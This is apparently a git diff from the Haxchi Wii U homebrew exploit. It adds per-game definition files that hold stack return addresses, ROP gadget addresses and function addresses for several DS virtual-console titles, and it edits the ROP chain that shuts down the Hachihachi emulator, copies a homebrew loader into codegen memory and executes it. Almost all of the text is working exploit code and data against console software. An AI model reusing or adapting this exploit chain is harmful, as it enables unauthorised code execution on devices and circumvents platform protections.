CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220DA0)
_START_EXIT equ (RPX_OFFSET + 0x0202693C)

39
payload_generator/defines/pokemonranger_defs.s Normal file
View File

@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079B664-0xB8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C91938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16440E00)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0204A6A0)
BCTRL equ (RPX_OFFSET + 0x02003D2C)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020AAB64)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020AA73C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001A8C)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x021806C4)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x022800B0)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020187E8)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B5FA4)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F35C)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020871A4)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205B638)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018870)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021507F8)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020241EC)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02229E4C)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222A268)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x02229CF8)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006B64)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FC44)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x0222993C)
_START_EXIT equ (RPX_OFFSET + 0x02026314)

39
payload_generator/defines/sfcommand_defs.s Normal file
View File

@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x10796964-0xB8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C8C938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x1643F200)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02063D3C)
BCTRL equ (RPX_OFFSET + 0x02004158)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3670)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A3248)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0200106C)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x021791C8)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277BA4)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEAB0)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082E20)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x020578EC)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02149304)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02221A48)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E64)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x022218F4)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220DAC)
_START_EXIT equ (RPX_OFFSET + 0x0202699C)

39
payload_generator/defines/sm64ds_defs.s Normal file
View File

@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x107991A4-0xC0)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C8F938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16443300)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02049628)
BCTRL equ (RPX_OFFSET + 0x0200415C)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A6E10)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A69E8)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0200106C)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0217C968)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x0227B400)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0201899C)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B2250)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F510)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02085334)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x020596A4)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018A24)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214CAA4)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02024274)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02225208)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02225624)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x022250B4)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006D30)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FC7C)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x022247D8)
_START_EXIT equ (RPX_OFFSET + 0x02026908)

39
payload_generator/defines/yoshids_defs.s Normal file
View File

@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079B5E4-0xB8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C91938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16444200)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02206F7C)
BCTRL equ (RPX_OFFSET + 0x02206EB4)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3508)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A3134)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001068)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179060)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277A3C)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018910)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AE948)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4B0)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DBC)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02057874)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018998)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214919C)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240F4)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x022218E0)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221CFC)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222178C)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CD0)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB24)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220C44)
_START_EXIT equ (RPX_OFFSET + 0x02026944)

39
payload_generator/defines/zeldaph_defs.s Normal file
View File

@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x10799D24-0xC0)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C8F938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16443400)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0204AB1C)
BCTRL equ (RPX_OFFSET + 0x02003CF0)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A9E30)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A9A08)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02000BA8)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0217F988)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x0227E524)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018548)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B5270)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F0BC)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02088050)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205C438)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x020185D0)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214FAC4)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02023F14)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x0222832C)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02228748)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x022281D8)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x020068C4)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201F97C)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x022278FC)
_START_EXIT equ (RPX_OFFSET + 0x02025FB0)

39
payload_generator/defines/zeldast_defs.s Normal file
View File

@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079C564-0xC8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C92938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16441D00)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0200369C)
BCTRL equ (RPX_OFFSET + 0x020041D8)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020ABF18)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020ABAF0)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001AF8)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02181A50)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x022815B4)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018A88)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B7358)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F610)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02088270)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205B0C8)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018B10)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02151B84)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0202441C)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x0222B28C)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222B6A8)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222B138)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006E2C)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FE74)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x0222AD7C)
_START_EXIT equ (RPX_OFFSET + 0x02026544)

0
haxchi.s → payload_generator/haxchi.s
View File

17
haxchi_rop.s → payload_generator/haxchi_rop.s
View File

@ -118,8 +118,10 @@ rop_hook_start:
.arm.big
rop_start:
; quit out of GX2 so we can re-use it in core 0
; do hachihachi cleanups so we can use everything safely
call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
call_func NERD_FASTWIIU_SHUTDOWN, 0, 0, 0, 0
call_func CORE_SHUTDOWN, 0, 0, 0, 0
; set up hbl_loader in core 0
call_func_6args NERD_CREATETHREAD, NERD_THREAD0OBJECT, LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR, 0x1007E7A8, thread0_param, 0x0, 0x0
@ -198,13 +200,6 @@ rop_start:
call_func NERD_STARTTHREAD, NERD_THREAD0OBJECT, 0x0, 0x0, 0x0
call_func NERD_JOINTHREAD, NERD_THREAD0OBJECT, 0x0, 0x0, 0x0
; clean up the rest of hachihachi
call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
call_func CORE_SHUTDOWN, 0, 0, 0, 0
; on exit we want to go into mii studio directly
call_func _SYSLaunchMiiStudio, 0x0, 0x0, 0x0, 0x0
; prepare system for foreground release
call_func OSSAVESDONE_READYTORELEASE, 0, 0, 0, 0
@ -219,7 +214,7 @@ rop_start:
call_func OSRELEASEFOREGROUND, 0, 0, 0, 0
; launch mii studio app
.word _EXIT
.word _START_EXIT
core0rop:
; switch codegen to RW
@ -227,11 +222,11 @@ rop_start:
; memcpy code
call_func MEMCPY, HBL_LOADER_ADR, hbl_loader, hbl_loader_end - hbl_loader, 0x0
call_func DC_FLUSHRANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0
call_func DC_FLUSHRANGE, HBL_LOADER_ADR, hbl_loader_end - hbl_loader, 0x0, 0x0
; switch codegen to RX
call_func OSCODEGEN_SWITCHSECMODE, 0x1, 0x0, 0x0, 0x0
call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0
call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, hbl_loader_end - hbl_loader, 0x0, 0x0
; execute option_select in codegen
.word HBL_LOADER_ADR